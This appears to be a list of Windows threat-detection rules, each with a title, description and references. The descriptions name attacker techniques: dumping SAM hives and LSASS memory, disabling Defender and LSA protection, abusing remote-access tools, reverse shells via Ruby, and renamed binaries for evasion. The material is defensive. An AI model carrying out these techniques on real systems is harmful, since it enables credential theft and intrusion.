Potential Suspicious Registry File Imported Via Reg.EXE Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import
LSA PPL Protection Disabled Via Reg.EXE Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/
Modify Group Policy Settings Detects malicious GPO modifications, which can be used to implement many other malicious behaviors. https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md
Suspicious Reg Add Open Command Threat actors performed dumping of the SAM, SECURITY and SYSTEM registry hives using the DelegateExecute key. https://thedfirreport.com/2021/12/13/diavol-ransomware/
Enumeration for Credentials in Registry Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md
Enable LM Hash Storage - ProcCreation Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password, https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/
RestrictedAdminMode Registry Value Tampering - ProcCreation Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised. https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md, https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
Detected Windows Software Discovery Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md, https://github.com/harleyQu1nn/AggressorScripts
Potential Tampering With RDP Related Registry Keys Via Reg.EXE Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Potential Configuration And Service Reconnaissance Via Reg.EXE Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md
Suspicious ScreenSave Change by Reg.exe Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md, https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
Changing Existing Service ImagePath Value Via Reg.EXE Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for the registry to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe
Reg Add Suspicious Paths Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md, https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Disabled Volume Snapshots Detects commands that temporarily turn off Volume Snapshots https://twitter.com/0gtweet/status/1354766164166115331
Suspicious Windows Defender Registry Key Tampering Via Reg.EXE Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection. https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/, https://github.com/swagkarna/Defeat-Defender-V1.2.0, https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2
Write Protect For Storage Disabled Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by the cypherpunk group. https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html
Suspicious Query of MachineGUID Detects the use of reg to get MachineGuid information. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery
Remote Access Tool - AnyDesk Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
Remote Access Tool - AnyDesk Piped Password Via CLI Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. https://redcanary.com/blog/misbehaving-rats/
Remote Access Tool - AnyDesk Silent Installation Detects AnyDesk Remote Desktop silent installation, which can be used by attackers to gain remote access. https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20, https://support.anydesk.com/Automatic_Deployment
Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate. This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/, https://anydesk.com/en/changelog/windows
Remote Access Tool - Anydesk Execution From Suspicious Folder An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
Remote Access Tool - RURAT Execution From Unusual Location Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') https://redcanary.com/blog/misbehaving-rats/
Remote Access Tool - MeshAgent Command Execution via MeshCentral Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes. https://github.com/Ylianst/MeshAgent, https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173, https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55
Remote Access Tool - NetSupport Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md
Remote Access Tool - NetSupport Execution From Unusual Location Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files') https://redcanary.com/blog/misbehaving-rats/
Remote Access Tool - GoToAssist Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows
Remote Access Tool - LogMeIn Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows
Remote Access Tool - ScreenConnect Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows
Remote Access Tool - ScreenConnect Installation Execution Detects ScreenConnect program starts that establish remote access to a system. https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies
Remote Access Tool - ScreenConnect Remote Command Execution Detects the execution of a system command via the ScreenConnect RMM service. https://github.com/SigmaHQ/sigma/pull/4467
Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution Detects potentially suspicious child processes launched via the ScreenConnect client service. https://www.mandiant.com/resources/telegram-malware-iranian-espionage, https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708, https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Remote Access Tool - ScreenConnect Server Web Shell Execution Detects potential web shell execution from the ScreenConnect server process. https://blackpointcyber.com/resources/blog/breaking-through-the-screen/, https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
Remote Access Tool - Simple Help Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
Remote Access Tool - Team Viewer Session Started On Windows Host Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. Internal Research
Remote Access Tool - UltraViewer Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md
Discovery of a System Time Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md
Renamed AdFind Execution Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain. https://www.joeware.net/freetools/tools/adfind/, https://thedfirreport.com/2020/05/08/adfind-recon/, https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/, https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md
Renamed AutoHotkey.EXE Execution Detects execution of a renamed autohotkey.exe binary based on PE metadata fields https://www.autohotkey.com/download/, https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/
Renamed AutoIt Execution Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious. https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w, https://www.autoitscript.com/site/
Potential Defense Evasion Via Binary Rename Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName data point. https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html, https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process
Potential Defense Evasion Via Rename Of Highly Relevant Binaries Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName data point. https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html, https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html, https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks, https://twitter.com/christophetd/status/1164506034720952320, https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
Renamed BOINC Client Execution Detects the execution of a renamed BOINC binary. https://boinc.berkeley.edu/, https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details, https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
Renamed BrowserCore.EXE Execution Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) https://twitter.com/mariuszbit/status/1531631015139102720
Renamed Cloudflared.EXE Execution Detects the execution of a renamed "cloudflared" binary. https://github.com/cloudflare/cloudflared/releases, https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
Renamed CreateDump Utility Execution Detects use of a renamed legitimate createdump.exe LOLBIN utility to dump process memory. https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://twitter.com/bopin2020/status/1366400799199272960
Renamed CURL.EXE Execution Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields https://twitter.com/Kostastsale/status/1700965142828290260
Renamed ZOHO Dctask64 Execution Detects a renamed "dctask64.exe" execution, a binary signed by ZOHO Corporation that is part of ManageEngine Endpoint Central. This binary can be abused for DLL injection and arbitrary command and process execution. https://twitter.com/gN3mes1s/status/1222088214581825540, https://twitter.com/gN3mes1s/status/1222095963789111296, https://twitter.com/gN3mes1s/status/1222095371175911424
Renamed FTP.EXE Execution Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields https://lolbas-project.github.io/lolbas/Binaries/Ftp/
Renamed Gpg.EXE Execution Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. https://securelist.com/locked-out/68960/
Renamed Jusched.EXE Execution Detects the execution of a renamed "jusched.exe" as seen used by the Cobalt group. https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf
Renamed Mavinject.EXE Execution Detects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md, https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e, https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152, https://github.com/SigmaHQ/sigma/issues/3742, https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection
Renamed MegaSync Execution Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. https://redcanary.com/blog/rclone-mega-extortion/
Renamed Msdt.EXE Execution Detects the execution of a renamed "Msdt.exe" binary https://lolbas-project.github.io/lolbas/Binaries/Msdt/
Renamed Microsoft Teams Execution Detects the execution of a renamed Microsoft Teams binary. Internal Research
Renamed NetSupport RAT Execution Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings https://redcanary.com/blog/misbehaving-rats/
Renamed NirCmd.EXE Execution Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/, https://www.nirsoft.net/utils/nircmd.html
Renamed Office Binary Execution Detects the execution of a renamed office binary https://infosec.exchange/@sbousseaden/109542254124022664
Renamed PAExec Execution Detects execution of renamed version of PAExec. Often used by attackers https://www.poweradmin.com/paexec/, https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
Renamed PingCastle Binary Execution Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://www.pingcastle.com/documentation/scanner/
Renamed Plink Execution Detects the execution of a renamed version of the Plink binary https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/, https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html
Visual Studio NodejsTools PressAnyKey Renamed Execution Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries https://twitter.com/mrd0x/status/1463526834918854661, https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5
Potential Renamed Rundll32 Execution Detects when 'DllRegisterServer' is called in the command line and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection. https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
Renamed Remote Utilities RAT (RURAT) Execution Detects execution of renamed Remote Utilities (RURAT) via Product PE header field https://redcanary.com/blog/misbehaving-rats/
Renamed SysInternals DebugView Execution Detects suspicious renamed SysInternals DebugView execution https://www.epicturla.com/blog/sysinturla
Renamed ProcDump Execution Detects the execution of a renamed ProcDump executable. This is often done by attackers or malware in order to evade defensive mechanisms. https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
Renamed PsExec Service Execution Detects suspicious launch of a renamed version of the PSEXESVC service, which is not often used by legitimate administrators. https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.youtube.com/watch?v=ro2QuZTIMBM
Renamed Sysinternals Sdelete Execution Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
Renamed Vmnat.exe Execution Detects renamed vmnat.exe or portable version that can be used for DLL side-loading https://twitter.com/malmoeb/status/1525901219247845376
Renamed Whoami Execution Detects the execution of whoami that has been renamed to a different name to avoid detection https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
Capture Credentials with Rpcping.exe Detects use of Rpcping.exe to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. https://lolbas-project.github.io/lolbas/Binaries/Rpcping/, https://twitter.com/vysecurity/status/974806438316072960, https://twitter.com/vysecurity/status/873181705024266241, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)
Ruby Inline Command Execution Detects execution of ruby using the "-e" flag. This could be used as a way to launch a reverse shell or execute live ruby code. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Potential Rundll32 Execution With DLL Stored In ADS Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). https://lolbas-project.github.io/lolbas/Binaries/Rundll32
Suspicious Advpack Call Via Rundll32.EXE Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function https://twitter.com/Hexacorn/status/1224848930795552769, http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/
Suspicious Rundll32 Invoking Inline VBScript Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
Rundll32 InstallScreenSaver Execution An attacker may execute an application as an SCR file using rundll32.exe desk.cpl,InstallScreenSaver https://lolbas-project.github.io/lolbas/Libraries/Desk/, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl
Suspicious Key Manager Access Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) https://twitter.com/NinjaParanoid/status/1516442028963659777
Rundll32 Execution Without CommandLine Parameters Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity https://www.cobaltstrike.com/help-opsec, https://twitter.com/ber_m1ng/status/1397948048135778309
Mshtml.DLL RunHTMLApplication Suspicious Usage Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) https://twitter.com/n1nj4sec/status/1421190238081277959, https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt, http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
Suspicious NTLM Authentication on the Printer Spooler Service Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service https://twitter.com/med0x2e/status/1520402518685200384, https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
Potential Obfuscated Ordinal Call Via Rundll32 Detects execution of "rundll32" with potential obfuscated ordinal calls Internal Research
Rundll32 Spawned Via Explorer.EXE Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. https://redcanary.com/blog/raspberry-robin/, https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Process Memory Dump Via Comsvcs.DLL Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) https://twitter.com/shantanukhande/status/1229348874298388484, https://twitter.com/pythonresponder/status/1385064506049630211?s=21, https://twitter.com/Hexacorn/status/1224848930795552769, https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/, https://twitter.com/SBousseaden/status/1167417096374050817, https://twitter.com/Wietze/status/1542107456507203586, https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py
Rundll32 Registered COM Objects Detects rundll32 loading malicious registered COM objects https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md
Suspicious Process Start Locations Detects suspicious process run from unusual locations https://car.mitre.org/wiki/CAR-2013-05-002
Suspicious Rundll32 Setupapi.dll Activity The setupapi.dll library provides the InstallHinfSection function for processing INF files. An INF file may contain instructions to create registry values, modify files and install drivers, so this technique can be used to obtain persistence by modifying one of the Run or RunOnce registry keys, to run a process, or to chain calls through other DLLs (see references). Note that InstallHinfSection in setupapi.dll launches the runonce.exe executable regardless of the actual content of the INF file. https://lolbas-project.github.io/lolbas/Libraries/Setupapi/, https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf, https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf, https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20
Shell32 DLL Execution in Suspicious Directory Detects shell32.dll executing a DLL in a suspicious directory https://www.group-ib.com/resources/threat-research/red-curl-2.html
Potential ShellDispatch.DLL Functionality Abuse Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
RunDLL32 Spawning Explorer Detects RunDLL32.exe spawning explorer.exe as a child, which is very uncommon; Gamarue has been observed spawning the explorer.exe process in this unusual way https://redcanary.com/blog/intelligence-insights-november-2021/
Potentially Suspicious Rundll32 Activity Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/, https://twitter.com/Hexacorn/status/885258886428725250, https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52, https://twitter.com/nas_bench/status/1433344116071583746, https://twitter.com/eral4m/status/1479106975967240209, https://twitter.com/eral4m/status/1479080793003671557
Suspicious Control Panel DLL Load Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits https://twitter.com/rikvduijn/status/853251879320662017, https://twitter.com/felixw3000/status/853354851128025088
Suspicious Rundll32 Execution With Image Extension Detects the execution of Rundll32.exe with DLL files masquerading as image files https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
Suspicious Usage Of ShellExec_RunDLL Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the Raspberry Robin attack https://redcanary.com/blog/raspberry-robin/, https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/, https://github.com/SigmaHQ/sigma/issues/1009
Suspicious ShellExec_RunDLL Call Via Ordinal Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine. https://redcanary.com/blog/raspberry-robin/, https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/, https://github.com/SigmaHQ/sigma/issues/1009, https://strontic.github.io/xcyclopedia/library/shell32.dll-65DA072F25DE83D9F83653E3FEA3644D.html
ShimCache Flush Detects actions that clear the local ShimCache and remove forensic evidence https://medium.com/@blueteamops/shimcache-flush-89daff28d15e
Suspicious Rundll32 Activity Invoking Sys File Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
Potentially Suspicious Rundll32.EXE Execution of UDL File Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. https://trustedsec.com/blog/oops-i-udld-it-again
Rundll32 Execution With Uncommon DLL Extension Detects the execution of rundll32 with a command line that doesn't contain a common extension https://twitter.com/mrd0x/status/1481630810495139841?s=12
